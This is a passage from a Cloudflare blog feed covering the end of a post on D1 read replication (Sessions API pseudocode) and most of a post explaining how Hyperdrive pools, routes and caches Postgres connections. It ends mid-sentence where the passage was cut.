create a set of replicas according to a replication policy.  The current replication policy that D1 uses is simple: a static set of replicas in <a href="https://developers.cloudflare.com/d1/configuration/data-location/#available-location-hints"><u>every region that D1 supports</u></a>.  Second, we turn on a routing policy for the Durable Object.  The current policy that D1 uses is also simple: route to the Durable Object replica in the region close to where the user request is.  With this step, we have updateable read-only replicas, and can route requests to them!</p><p>Fourth, we updated D1’s Durable Object code to handle write queries on replicas. D1 uses SQLite to figure out whether a request is a write query or a read query.  This means that the determination of whether something is a read or write query happens <i>after</i> the request is routed.  Read replicas will have to handle write requests!  We solve this by instantiating each replica D1 Durable Object with a reference to its primary.  If the D1 Durable Object determines that the query is a write query, it forwards the request to the primary for the primary to handle. This happens transparently, keeping the user code simple.</p><p>As of this fourth step, we can handle read and write queries at every copy of the D1 Durable Object, whether it's a primary or not.  Unfortunately, as outlined above, if a user's requests get routed to different read replicas, they may see different views of the database, leading to a very weak consistency model.  So the last step is to implement the Sessions API across the D1 Worker and D1 Durable Object.  Recall that every WAL entry is marked with a bookmark.  These bookmarks uniquely identify a point in (logical) time in the database.  Our bookmarks are strictly monotonically increasing; every write to a database makes a new bookmark with a value greater than any other bookmark for that database.</p><p>Using bookmarks, we implement the Sessions API with the following algorithm split across the D1 binding implementation, the D1 Worker, and D1 Durable Object.</p><p>First up in the D1 binding, we have code that creates the <code>D1DatabaseSession</code> object and code within the <code>D1DatabaseSession</code> object to keep track of the latest bookmark.</p>
            <pre><code>// D1Binding is the binding code running within the user's Worker
// that provides the existing D1 Workers API and the new withSession method.
class D1Binding {
  // Injected by the runtime to the D1 Binding.
  d1Service: D1ServiceBinding

  function withSession(initialBookmark) {
    return D1DatabaseSession(this.d1Service, this.databaseId, initialBookmark);
  }
}

// D1DatabaseSession holds metadata about the session, most importantly the
// latest bookmark we know about for this session.
class D1DatabaseSession {
  constructor(d1Service, databaseId, initialBookmark) {
    this.d1Service = d1Service;
    this.databaseId = databaseId;
    this.bookmark = initialBookmark;
  }

  async exec(query) {
    // The exec method in the binding sends the query to the D1 Worker
    // and waits for the the response, updating the bookmark as
    // necessary so that future calls to exec use the updated bookmark.
    var resp = await this.d1Service.handleUserQuery(databaseId, query, bookmark);
    if (isNewerBookmark(this.bookmark, resp.bookmark)) {
      this.bookmark = resp.bookmark;
    }
    return resp;
  }

  // batch and other SQL APIs are implemented similarly.
}</code></pre>
            <p>The binding code calls into the D1 stateless Worker (<code>d1Service</code> in the snippet above), which figures out which Durable Object to use, and proxies the request to the Durable Object.</p>
            <pre><code>class D1Worker {
  async handleUserQuery(databaseId, query) {
    var doId = /* look up Durable Object for databaseId */;
    return await this.D1_DO.get(doId).handleWorkerQuery(query, bookmark)
  }
}</code></pre>
            <p>Finally, we reach the Durable Objects layer, which figures out how to actually handle the request.</p>
            <pre><code>class D1DurableObject {
  async handleWorkerQuery(queries, bookmark) {
    var bookmark = bookmark ?? "first-primary";
    var results = {};

    if (this.isPrimaryDatabase()) {
      // The primary always has the latest data so we can run the
      // query without checking the bookmark.
      var result = /* execute query directly */;
      bookmark = getCurrentBookmark();
      results = result;
    } else {
      // This is running on a replica.
      if (bookmark === "first-primary" || isWriteQuery(query)) {
        // The primary must handle this request, so we'll proxy the
        // request to the primary.
        var resp = await this.primary.handleWorkerQuery(query, bookmark);
        bookmark = resp.bookmark;
        results = resp.results;
      } else {
        // The replica can handle this request, but only after the
        // database is up-to-date with the bookmark.
        if (bookmark !== "first-unconstrained") {
          await waitForBookmark(bookmark);
        }
        var result = /* execute query locally */;
        bookmark = getCurrentBookmark();
        results = result;
      }
    }
    return { results: results, bookmark: bookmark };
  }
}</code></pre>
            <p>The D1 Durable Object first figures out if this instance can handle the query, or if the query needs to be sent to the primary.  If the Durable Object can execute the query, it ensures that we execute the query with a bookmark at least as up-to-date as the bookmark requested by the binding.</p><p>The upshot is that the three pieces of code work together to ensure that all of the queries in the session see the database in a sequentially consistent order, because each new query will be blocked until it has seen the results of previous queries within the same session.</p>
    <div>
      <h2>Conclusion</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>D1’s new read replication feature is a significant step towards making globally distributed databases easier to use without sacrificing consistency. With automatically provisioned replicas in every region, your applications can now serve read queries faster while maintaining strong sequential consistency across requests, and keeping your application Worker code simple.</p><p>We’re excited for developers to explore this feature and see how it improves the performance of your applications. The public beta is just the beginning—we’re actively refining and expanding D1’s capabilities, including evolving replica placement policies, and your feedback will help shape what’s next.</p><p>Note that the Sessions API is only available through the <a href="https://developers.cloudflare.com/d1/worker-api/"><u>D1 Worker Binding</u></a> for now, and support for the HTTP REST API will follow soon.</p><p>Try out D1 read replication today by clicking the “Deploy to Cloudflare" button, check out <a href="http://developers.cloudflare.com/d1/best-practices/read-replication/"><u>documentation and examples</u></a>, and let us know what you build in the <a href="https://discord.com/channels/595317990191398933/992060581832032316"><u>D1 Discord channel</u></a>!</p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/cloudflare/templates/tree/main/d1-starter-sessions-api-template"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p></p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[D1]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Edge Database]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[SQL]]></category>
            <guid isPermaLink="false">2qUAO70BqnRBomg83fCRPe</guid>
            <dc:creator>Justin Mazzola Paluska</dc:creator>
            <dc:creator>Lambros Petrou</dc:creator>
        </item>
        <item>
            <title><![CDATA[Pools across the sea: how Hyperdrive speeds up access to databases and why we’re making it free]]></title>
            <link>https://blog.cloudflare.com/how-hyperdrive-speeds-up-database-access/</link>
            <pubDate>Tue, 08 Apr 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Hyperdrive, Cloudflare's global connection pooler, relies on some key innovations to make your database connections work. Let's dive deeper, in celebration of its availability for Free Plan customers. ]]></description>
            <content:encoded><![CDATA[ <p></p><p></p>
    <div>
      <h2>Free as in beer</h2>
      <a href="#free-as-in-beer">
        
      </a>
    </div>
    <p>In acknowledgement of its pivotal role in building distributed applications that rely on regional databases, we’re making Hyperdrive available on the free plan of Cloudflare Workers!</p><p><a href="https://developers.cloudflare.com/hyperdrive/"><u>Hyperdrive</u></a> enables you to build performant, global apps on Workers with <a href="https://developers.cloudflare.com/hyperdrive/examples/"><u>your existing SQL databases</u></a>. Tell it your database connection string, bring your existing drivers, and Hyperdrive will make connecting to your database faster. No major <a href="https://www.cloudflare.com/learning/cloud/how-to-refactor-applications/">refactors</a> or convoluted configuration required.</p><p>Over the past year, Hyperdrive has become a key service for teams that want to build their applications on Workers and connect to SQL databases. This includes our own engineering teams, with Hyperdrive serving as the tool of choice to connect from Workers to our own Postgres clusters for many of the control-plane actions of our billing, <a href="https://www.cloudflare.com/developer-platform/products/d1/"><u>D1</u></a>, <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a>, and <a href="https://www.cloudflare.com/developer-platform/products/workers-kv/"><u>Workers KV</u></a> teams (just to name a few). </p><p>This has highlighted for us that Hyperdrive is a fundamental building block, and it solves a common class of problems for which there isn’t a great alternative. We want to make it possible for everyone building on Workers to connect to their database of choice with the best performance possible, using the drivers and frameworks they already know and love.</p>
    <div>
      <h3>Performance is a feature</h3>
      <a href="#performance-is-a-feature">
        
      </a>
    </div>
    <p>To illustrate how much Hyperdrive can improve your application’s performance, let’s write the world’s simplest benchmark. This is obviously not production code, but is meant to be reflective of a common application you’d bring to the Workers platform. We’re going to use a simple table, a very popular OSS driver (<a href="https://github.com/porsager/postgres"><u>postgres.js</u></a>), and run a standard OLTP workload from a Worker. We’re going to keep our origin database in London, and query it from Chicago (those locations will come back up later, so keep them in mind).</p>
            <pre><code>// This is the test table we're using
// CREATE TABLE IF NOT EXISTS test_data(userId bigint, userText text, isActive bool);

import postgres from 'postgres';

let direct_conn = '&lt;direct connection string here!&gt;';
let hyperdrive_conn = env.HYPERDRIVE.connectionString;

async function measureLatency(connString: string) {
	let beginTime = Date.now();
	let sql = postgres(connString);

	await sql`INSERT INTO test_data VALUES (${999}, 'lorem_ipsum', ${true})`;
	await sql`SELECT userId, userText, isActive FROM test_data WHERE userId = ${999}`;

	let latency = Date.now() - beginTime;
	ctx.waitUntil(sql.end());
	return latency;
}

let directLatency = await measureLatency(direct_conn);
let hyperdriveLatency = await measureLatency(hyperdrive_conn);</code></pre>
            <p>The code above</p><ol><li><p>Takes a standard database connection string, and uses it to create a database connection.</p></li><li><p>Loads a user record into the database.</p></li><li><p>Queries all records for that user.</p></li><li><p>Measures how long this takes to do with a direct connection, and with Hyperdrive.</p></li></ol><p>When connecting directly to the origin database, this set of queries takes an average of 1200 ms. With absolutely no other changes, just swapping out the connection string for <code>env.HYPERDRIVE.connectionString</code>, this number is cut down to 500 ms (an almost 60% reduction). If you enable Hyperdrive’s caching, so that the SELECT query is served from cache, this takes only 320 ms. With this one-line change, Hyperdrive will reduce the latency of this Worker by almost 75%! In addition to this speedup, you also get secure auth and transport, as well as a connection pool to help protect your database from being overwhelmed when your usage scales up. See it for yourself using our <a href="https://hyperdrive-demo.pages.dev/"><u>demo application</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6TTbEV9d7NClGk0iRmkEG3/4d5e4fdeb195337a92942bc7e13dbb6f/image7.png" />
          </figure><p><sup><i>A demo application comparing latencies between Hyperdrive and direct-to-database connections.</i></sup></p><p>Traditional SQL databases are familiar and powerful, but they are designed to be colocated with long-running compute. They were not conceived in the era of modern serverless applications, and have connection models that don't take the constraints of such an environment into account. Instead, they require highly stateful connections that do not play well with Workers’ global and stateless model. Hyperdrive solves this problem by maintaining database connections across Cloudflare’s network ready to be used at a moment’s notice, caching your queries for fast access, and eliminating round trips to minimize network latency.</p><p>With this announcement, many developers are going to be taking a look at Hyperdrive for the first time over the coming weeks and months. To help people dive in and try it out, we think it’s time to talk about how Hyperdrive actually works.</p>
    <div>
      <h2>Staying warm in the pool</h2>
      <a href="#staying-warm-in-the-pool">
        
      </a>
    </div>
    <p>Let’s talk a bit about database connection poolers, how they work, and what problems they already solve. They are <a href="https://github.com/pgbouncer/pgbouncer/commit/a0d2b294e0270f8a246e5b98f0700716c0672b0d"><u>hardly a new technology</u></a>, after all. </p><p>The point of any connection pooler, Hyperdrive or others, is to minimize the overhead of establishing and coordinating database connections. Every new database connection requires additional <a href="https://blog.anarazel.de/2020/10/07/measuring-the-memory-overhead-of-a-postgres-connection/"><u>memory</u></a> and CPU time from the database server, and this can only scale just so well as the number of concurrent connections climbs. So the question becomes, how should database connections be shared across clients? </p><p>There are three <a href="https://www.pgbouncer.org/features.html"><u>commonly-used approaches</u></a> for doing so. These are:</p><ul><li><p><b>Session mode:</b> whenever a client connects, it is assigned a connection of its own until it disconnects. This dramatically reduces the available concurrency, in exchange for much simpler implementation and a broader selection of supported features</p></li><li><p><b>Transaction mode:</b> when a client is ready to send a query or open a transaction, it is assigned a connection on which to do so. This connection will be returned to the pool when the query or transaction concludes. Subsequent queries during the same client session may (or may not) be assigned a different connection.</p></li><li><p><b>Statement mode:</b> Like transaction mode, but a connection is given out and returned for each statement. Multi-statement transactions are disallowed.</p></li></ul><p>When building Hyperdrive, we had to decide which of these modes we wanted to use. Each of the approaches implies some <a href="https://jpcamara.com/2023/04/12/pgbouncer-is-useful.html"><u>fairly serious tradeoffs</u></a>, so what’s the right choice? For a service intended to make using a database from Workers as pleasant as possible we went with the choice that balances features and performance, and designed Hyperdrive as a transaction-mode pooler. This best serves the goals of supporting a large number of short-lived clients (and therefore very high concurrency), while still supporting the transactional semantics that cause so many people to reach for an RDBMS in the first place.</p><p>In terms of this part of its design, Hyperdrive takes its cues from many pre-existing popular connection poolers, and manages operations to allow our users to focus on designing their full-stack applications. There is a configured limit to the number of connections the pool will give out, limits to how long a connection will be held idle until it is allowed to drop and return resources to the database, bookkeeping around <a href="https://blog.cloudflare.com/elephants-in-tunnels-how-hyperdrive-connects-to-databases-inside-your-vpc-networks/"><u>prepared statements</u></a> being shared across pooled connections, and other traditional concerns of the management of these resources to help ensure the origin database is able to run smoothly. These are all described in <a href="https://developers.cloudflare.com/hyperdrive/platform/limits/"><u>our documentation</u></a>.</p>
    <div>
      <h2>Round and round we go</h2>
      <a href="#round-and-round-we-go">
        
      </a>
    </div>
    <p>Ok, so why build Hyperdrive then? Other poolers that solve these problems already exist — couldn’t developers using Workers just run one of those and call it a day? It turns out that connecting to regional poolers from Workers has the same major downside as connecting to regional databases: network latency and round trips.</p><p>Establishing a connection, whether to a database or a pool, requires many exchanges between the client and server. While this is true for all fully-fledged client-server databases (e.g. <a href="https://dev.mysql.com/doc/dev/mysql-server/latest/page_protocol_connection_phase.html"><u>MySQL</u></a>, <a href="https://github.com/mongodb/specifications/blob/master/source/auth/auth.md"><u>MongoDB</u></a>), we are going to focus on the <a href="https://www.postgresql.org/docs/current/protocol-flow.html#PROTOCOL-FLOW-START-UP"><u>PostgreSQL</u></a> connection protocol flow in this post. As we work through all of the steps involved, what we most want to keep track of is how many round trips it takes to accomplish. Note that we’re mostly concerned about having to wait around while these happen, so “half” round trips such as in the first diagram are not counted. This is because we can send off the message and then proceed without waiting.</p><p>The first step to establishing a connection between Postgres client and server is very familiar ground to anyone who’s worked much with networks: <a href="https://www.cloudflare.com/learning/ddos/glossary/tcp-ip/"><u>a TCP startup handshake</u></a>. Postgres uses TCP for its underlying transport, and so we must have that connection before anything else can happen on top of it.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/58qrxBsbOXbFCFBzkZFIff/19caf62d24cdbf9c4ad69bfd8286e022/image5.png" />
          </figure><p>With our transport layer in place, the next step is to <a href="https://www.postgresql.org/docs/current/protocol-flow.html#PROTOCOL-FLOW-SSL"><u>encrypt</u></a> the connection. The <a href="https://www.cloudflare.com/learning/ssl/what-happens-in-a-tls-handshake/"><u>TLS Handshake</u></a> involves some back-and-forth in its own right, though this has been reduced to just one round trip for TLS 1.3. Below is the simplest and fastest version of this exchange, but there are certainly scenarios where it can be much more complex.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5q7fVVQkB9Q43X3eaE76GP/b69c0ce964df370bd0609242f8e3de0c/image4.png" />
          </figure><p>After the underlying transport is established and secured, the application-level traffic can actually start! However, we’re not quite ready for queries, the client still needs to authenticate to a specific user and database. Again, there are multiple supported approaches that offer varying levels of speed and security. To make this comparison as fair as possible, we’re again going to consider the version that offers the fastest startup (password-based authentication).</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7KU6NHgZAW95nQyobo9Zwn/5f61d6e9ab6233186c865a9093a7f352/image8.png" />
          </figure><p>So, for those keeping score, establishing a new connection to your database takes a bare minimum of 5 round trips, and can very quickly climb from there. </p><p>While the latency of any given network round trip is going to vary based on so many factors that “it depends” is the only meaningful measurement available, some quick benchmarking during the writing of this post shows ~125 ms from Chicago to London. Now multiply that number by 5 round trips and the problem becomes evident: 625 ms to start up a connection is not viable in a distributed serverless environment. So how does Hyperdrive solve it? What if I told you the trick is that we do it all twice? To understand Hyperdrive’s secret sauce, we need to dive into Hyperdrive’s architecture.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/291ua8XgVnowWDOfEm05eR/a2674a9a393fcaaef8e2cfe64dd57402/image1.png" />
          </figure>
    <div>
      <h2>Impersonating a database server</h2>
      <a href="#impersonating-a-database-server">
        
      </a>
    </div>
    <p>The rest of this post is a deep dive into answering the question of how Hyperdrive does what it does. To give the clearest picture, we’re going to talk about some internal subsystems by name. To help keep everything straight, let’s start with a short glossary that you can refer back to if needed. These descriptions may not make sense yet, but they will by the end of the article.
</p><table><tr><td><p><b>Hyperdrive subsystem name</b></p></td><td><p><b>Brief description</b></p></td></tr><tr><td><p>Client</p></td><td><p>Lives on the same server as your Worker, talks directly to your database driver. This caches query results and sends queries to Endpoint if needed.</p></td></tr><tr><td><p>Endpoint</p></td><td><p>Lives in the data center nearest to your origin database, talks to your origin database. This caches query results and houses a pool of connections to your origin database.</p></td></tr><tr><td><p>Edge Validator</p></td><td><p>Sends a request to a Cloudflare data center to validate that Hyperdrive can connect to your origin database at time of creation.</p></td></tr><tr><td><p>Placement</p></td><td><p>Builds on top of Edge Validator to connect to your origin database from all eligible data centers, to identify which have the fastest connections.</p></td></tr></table><p>The first subsystem we want to dig into is named <code>Client. Client</code>’s first job is to pretend to be a database server. When a user’s Worker wants to connect to their database via Hyperdrive, they use a special connection string that the Worker runtime generates on the fly. This tells the Worker to reach out to a Hyperdrive process running on the same Cloudflare server, and direct all traffic to and from the database client to it.</p>
            <pre><code>import postgres from "postgres";

// Connect to Hyperdrive
const sql = postgres(env.HYPERDRIVE.connectionString);

// sql will now talk over an RPC channel to Hyperdrive, instead of via TCP to Postgres</code></pre>
            <p>Once this connection is established, the database driver will perform the usual handshake expected of it, with our <code>Client</code> playing the role of a database server and sending the appropriate responses. All of this happens on the same Cloudflare server running the Worker, and we observe that the p90 for all this is 4 ms (p50 is 2 ms). Quite a bit better than 625 ms, but how does that help? The query still needs to get to the database, right?</p><p><code>Client</code>’s second main job is to inspect the queries sent from a Worker, and decide whether they can be served from Cloudflare’s cache. We’ll talk more about that later on. Assuming that there are no cached query results available, <code>Client</code> will need to reach out to our second important subsystem, which we call <code>Endpoint</code>.</p>
    <div>
      <h2>In for the long haul</h2>
      <a href="#in-for-the-long-haul">
        
      </a>
    </div>
    <p>Before we dig into the role <code>Endpoint</code> plays, it’s worth talking more about how the <code>Client→Endpoint</code> connection works, because it’s a key piece of our solution. We have already talked a lot about the price of network round trips, and how a Worker might be quite far away from the origin database, so how does Hyperdrive handle the long trip from the <code>Client</code> running alongside their Worker to the <code>Endpoint</code> running near their database without expensive round trips?</p><p>This is accomplished with a very handy bit of Cloudflare’s networking infrastructure. When <code>Client</code> gets a cache miss, it will submit a request to our networking platform for a connection to whichever data center <code>Endpoint</code> is running on. This platform keeps a pool of ready TCP connections between all of Cloudflare’s data centers, such that we don’t need to do any preliminary handshakes to begin sending application-level traffic. You might say we put a connection pooler in our connection pooler.</p><p>Over this TCP connection, we send an initialization message that includes all of the buffered query messages the Worker has sent to <code>Client</code> (the mental model would be something like a <code>SYN</code> and a payload all bundled together). <code>Endpoint</code> will do its job processing this query, and respond by streaming the response back to <code>Client</code>, leaving the streaming channel open for any followup queries until <code>Client</code> disconnects. This approach allows us to send queries around the world with zero wasted round trips.</p>
    <div>
      <h2>Impersonating a database client</h2>
      <a href="#impersonating-a-database-client">
        
      </a>
    </div>
    <p><code>Endpoint</code> has a couple different jobs it has to do. Its first job is to pretend to be a database client, and to do the client half of the handshake shown above. Second, it must also do the same query processing that <code>Client</code> does with query messages. Finally, <code>Endpoint</code> will make the same determination on when it needs to reach out to the origin database to get uncached query results.</p><p>When <code>Endpoint</code> needs to query the origin database, it will attempt to take a connection out of a limited-size pool of database connections that it keeps. If there is an unused connection available, it is handed out from the pool and used to ferry the query to the origin database, and the results back to <code>Endpoint</code>. Once <code>Endpoint</code> has these results, the connection is immediately returned to the pool so that another <code>Client</code> can use it. These warm connections are usable in a matter of microseconds, which is obviously a dramatic improvement over the round trips from one region to another that a cold startup handshake would require.</p><p>If there are no currently unused connections sitting in the pool, it may start up a new one (assuming the pool has not already given out as many connections as it is allowed to). This set of handshakes looks exactly the same as the one <code>Client</code> does, but it happens across the network between a Cloudflare data center and wherever the origin database happens to be. These are the same 5 round trips as our original example, but instead of a full Chicago→London path on every single trip, perhaps it’s Virginia→London, or even London→London. Latency here will depend on which data center <code>Endpoint</code> is being housed in.</p>
    <div>
      <h2>Distributed choreography</h2>
      <a href="#distributed-choreography">
        
      </a>
    </div>
    <p>Earlier, we mentioned that Hyperdrive is a transaction-mode pooler. This means that when a driver is ready to send a query or open a transaction it must get a connection from the pool to use. The core challenge for a transaction-mode pooler is in aligning the state of the driver with the state of the connection checked out from the pool. For example, if the driver thinks it’s in a transaction, but the database doesn’t, then you might get errors or even corrupted results.</p><p>Hyperdrive achieves this by ensuring all connections are in the same state when they’re checked out of the pool: idle and ready for a query. Where Hyperdrive differs from other transaction-mode poolers is that it does this dance of matching up the states of two different connections across machines, such that there’s no need to share state between <code>Client</code> and <code>Endpoint</code>! Hyperdrive can terminate the incoming connection in <code>Client</code> on the same machine running the Worker, and pool the connections to the origin database wherever makes the most sense.</p><p>The job of a transaction-mode pooler is a hard one. Database connections are fundamentally stateful and keeping track of that state is important to maintain our guise when impersonating either a database client or a server. As an example, one of the trickier pieces of state to manage are <a href="https://www.postgresql.org/docs/current/protocol-overview.html#PROTOCOL-QUERY-CONCEPTS"><u>prepared statements</u></a>. When a user creates a new prepared statement, the prepared statement is only created on whichever database connection happened to be checked out at that time. Once the user finishes the transaction or query they are processing, the connection holding that statement is returned to the pool. From the user’s perspective they’re still connected using the same database connection, so a new query or transaction can reasonably expect to use that previously prepared statement. If a different connection is handed out for the next query and the query wants to make use of this resource, the pooler has to do something about it. We went into some depth on this topic in a <a href="https://blog.cloudflare.com/postgres-named-prepared-statements-supported-hyperdrive/"><u>previous blog post</u></a> when we released this feature, but in sum, the process looks like this:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2ibtnO4URpLJ6m3Nyd2kpW/331059a6fd18c7d70b95a15af8f57cd6/image2.png" />
          </figure><p>Hyperdrive implements this by keeping track of what statements have been prepared by a given client, as well as what statements have been prepared on each origin connection in the pool. When a query comes in expecting to re-use a particular prepared statement (#8 above), Hyperdrive checks if it’s been prepared on the checked-out origin connection. If it hasn’t, Hyperdrive will replay the wire-protocol message sequence to prepare it on the newly-checked-out origin connection (#10 above) before sending the query over it. Many little corrections like this are necessary to keep the client’s connection to Hyperdrive and Hyperdrive’s connection to the origin database lined up so that both sides see what they expect.</p>
    <div>
      <h2>Better, faster, smarter, closer</h2>
      <a href="#better-faster-smarter-closer">
        
      </a>
    </div>
    <p>This “split connection” approach is the founding innovation of Hyperdrive, and one of the most vital aspects of it is how it affects starting up new connections. While the same 5+ round trips must always happen on startup, the actual time spent on the round trips can be dramatically reduced by conducting them over the smallest possible distances. This impact of distance can be so big that there is still a huge latency reduction even though the startup round trips must now happen <i>twice</i> (once each between the Worker and <code>Client</code>, and <code>Endpoint</code> and your origin database). So how do we decide where to run everything, to lean into that advantage as much as possible?</p><p>The placement of <code>Client</code> has not really changed since the original design of Hyperdrive. Sharing a server with the Worker sending the queries means that the Worker runtime can connect directly to Hyperdrive with no network hop needed. While there is always room for microoptimizations, it’s hard to do much better than that from an architecture perspective.  By far the bigger piece of the latency puzzle is where to run <code>Endpoint</code>.</p><p>Hyperdrive keeps a list of data centers that are eligible to house <code>Endpoint</code>s, requiring that they have sufficient capacity and the best routes available for pooled connections to use. The key challenge to overcome here is that a <a href="https://www.postgresql.org/docs/current/libpq-connect.html#LIBPQ-CONNSTRING-URIS"><u>database connection string</u></a> does not tell you where in the world a database actually is. The reality is that reliably going from a hostname to a precise (enough) geographic location is a hard problem, even leaving aside the additional complexity of doing so <a href="https://blog.cloudflare.com/elephants-in-tunnels-how-hyperdrive-connects-to-databases-inside-your-vpc-networks/"><u>within a private network</u></a>. So how do we pick from that list of eligible data centers?</p><p>For much of the time since its launch, Hyperdrive solved this with a regional pool approach. When a Worker connected to Hyperdrive, the location of the Worker was used to infer what region the end user was connecting from (e.g. ENAM, WEUR, APAC, etc. — see a rough breakdown <a href="https://www.cloudflare.com/network/"><u>here</u></a>). Data centers to house <code>Endpoint</code>s for any given Hyperdrive were deterministically selected from that region’s list of eligible options using <a href="https://en.wikipedia.org/wiki/Rendezvous_hashing"><u>rendezvous hashing</u></a>, resulting in one pool of connections <i>per region</i>.</p><p>This approach worked well enough, but it had some severe shortcomings. The first and most obvious is that there’s no guarantee that the data center selected for a given region is actually closer to the origin database than the user making the request. This means that, while you’re getting the benefit of the excellent routing available on <a href="https://www.cloudflare.com/network/"><u>Cloudflare's network</u></a>, you may be going significantly out of your way to do so. The second downside is that, in the scenario where a new connection must be created, the round trips to do so may be happening over a significantly larger distance than is necessary if the origin database is in a different region than the <code>Endpoint</code> housing the regional connection pool. This increases latency and reduces throughput for the query that needs to instantiate the connection.</p><p>The final key downside here is an unfortunate interaction with <a href="https://developers.cloudflare.com/workers/configuration/smart-placement/"><u>Smart Placement</u></a>, a feature of Cloudflare Workers that analyzes the duration of your Worker requests to identify the data center to run your Worker in. With regional <code>Endpoint</code>s, the best Smart Placement can possibly do is to put your requests close to the <code>Endpoint</code> for whichever region the origin database is in. Again, there may be other data centers that are closer, but Smart Placement has no way to do better than where the <code>Endpoint</code> is because all Hyperdrive queries must route through it.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3y9r3Dwn6APp5Pw6kqkg0Z/3a9e202670b6c65a22294fe777064add/image6.png" />
          </figure><p>We recently <a href="https://developers.cloudflare.com/changelog/2025-03-04-hyperdrive-pooling-near-database-and-ip-range-egress/"><u>shipped some improvements</u></a> to this system that significantly enhanced performance. The new system discards the concept of regional pools entirely, in favor of a single global <code>Endpoint</code> for each Hyperdrive that is in the eligible data center as close as possible to the origin database.</p><p>The way we solved locating the origin database such that we can accomplish this was ultimately very straightforward. We already had a subsystem to confirm, at the time of creation, that Hyperdrive could connect to an origin database using the provided information. We call this subsystem our <code>Edge Validator</code>.</p><p>It’s bad user experience to allow someone to create a Hyperdrive, and then find out when they go to use it that they mistyped their password or something. Now they’re stuck trying to debug with extra layers in the way, with a Hyperdrive that can’t possibly work. Instead, whenever a Hyperdrive is created, the <code>Edge Validator</code> will send a request to an arbitrary data center to use its instance of Hyperdrive to connect to the origin database. If this connection fails, the creation of the Hyperdrive will also fail, giving immediate feedback to the user at the time it is most helpful.</p><p>With our new subsystem, affectionately called <code>Placement</code>, we now have a solution to the geolocation problem. After <code>Edge Validator</code> has confirmed that the provided information works and the Hyperdrive is created, an extra step is run in the background. <code>Placement</code> will perform the exact same connection routine, except instead of being done once from an arbitrary data center, it is run a handful of times from every single data center that is eligible to house <code>Endpoints</code>. The latency of establishing these connections is collected, and the average is sent back to a central instance of <code>Placement</code>. The data centers that can connect to the origin database the fastest are, by definition, where we want to run <code>Endpoint</code> for this Hyperdrive. The list of these is saved, and at runtime is used to select the <code>Endpoint</code> best suited to housing the pool of connections to the origin database.</p><p>Given that the secret sauce of Hyperdrive is in managing and minimizing the latency of establishing these connections, moving <code>Endpoint</code>s right next to their origin databases proved to be pretty impactful.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1MZpaxXjj4tlOAinZkDqOF/e1a555a47141ac11aa391d27806cbfbc/image9.png" />
          </figure><p><sup><i>Pictured: query latency as measured from Endpoint to origin databases. The backfill of Placement to existing customers was done in stages on 02/22 and 02/25.</i></sup></p>
    <div>
      <h2>Serverless drivers exist, though?</h2>
      <a href="#serverless-drivers-exist-though">
        
      </a>
    </div>
    <p>While we went in a different direction, it’s worth acknowledging that other teams have <a href="https://neon.tech/blog/quicker-serverless-postgres"><u>solved this same problem</u></a> with a very different approach. Custom database drivers, usually called “serverless drivers”, have made several optimization efforts to reduce both the number of round trips and how quickly they can be conducted, while still connecting directly from your client to your database in the traditional way. While these drivers are impressive, we chose not to go this route for a couple of reasons.</p><p>First off, a big part of the appeal of using Postgres is its <a href="https://www.lastweekinaws.com/podcast/screaming-in-the-cloud/the-ever-growing-ecosystem-of-postgres-with-alvaro-hernandez/"><u>vibrant ecosystem</u></a>. Odds are good you’ve used Postgres before, and it can probably help solve whichever problem you’re tackling with your newest project. This familiarity and shared knowledge across projects is an absolute superpower. We wanted to lean into this advantage by supporting the most popular drivers already in this ecosystem, instead of fragmenting it by adding a competing one.</p><p>Second, Hyperdrive also functions as a cache for individual queries (a bit of trivia: its name while still in Alpha was actually <code>sql-query-cache</code>). Doing this as effectively as possible for distributed users requires some clever positioning of where exactly the query results should be cached. One of the unique advantages of running a distributed service on Cloudflare’s network is that we have a lot of flexibility on where to run things, and can confidently surmount challenges like those. If we’re going to be playing three-card monte with where things are happening anyway, it makes the most sense to favor that route for solving the other problems we’re trying to tackle too.</p>
    <div>
      <h2>Pick your favorite cache pun</h2>
      <a href="#pick-your-favorite-cache-pun">
        
      </a>
    </div>
    <p>As we’ve <a href="https://blog.cloudflare.com/postgres-named-prepared-statements-supported-hyperdrive/"><u>talked about</u></a> in the past, Hyperdrive buffers protocol messages until it has enough information to know whether a query can be served from cache. In a post about how Hyperdrive works it would be a shame to skip talking about how exactly we cache query results, so let’s close by diving into that.</p><p>First and foremost, Hyperdrive uses <a href="https://developers.cloudflare.com/cache/"><u>Cloudflare's cache</u></a>, because when you have technology like that already available to you, it’d be silly not to use it. This has some implications for our architecture that are worth exploring.</p><p>The cache exists in each of Cloudflare’s data centers, and by default these are separate instances. That means that a <code>Client</code> operating close to the user has one, and an <code>Endpoint</code> operating close to the origin database has one. However, historically we weren’t able to take full advantage of that, because the logic for interacting with cache was tightly bound to the logic for managing the pool of connections.</p><p>Part of our recent architecture refactoring effort, where we switched to global <code>Endpoint</code>s, was to split up this logic such that we can take advantage of <code>Client</code>’s cache too. This was necessary because, with <code>Endpoint</code> moving to a single location for each Hyperdrive, users from other regions would otherwise have gotten cache hits served from almost as far away as the origin.</p><p>With the new architecture, the role of <code>Client</code> during active query handling transitioned from that of a “dumb pipe” to more like what <code>Endpoint</code> had always been doing. It now buffers protocol messages, and serves results from cache if possible. In those scenarios, Hyperdrive’s traffic never leaves the data center that the Worker is running in, reducing query latencies from 20-70 ms to an average of around 4 ms. As a side benefit, it also 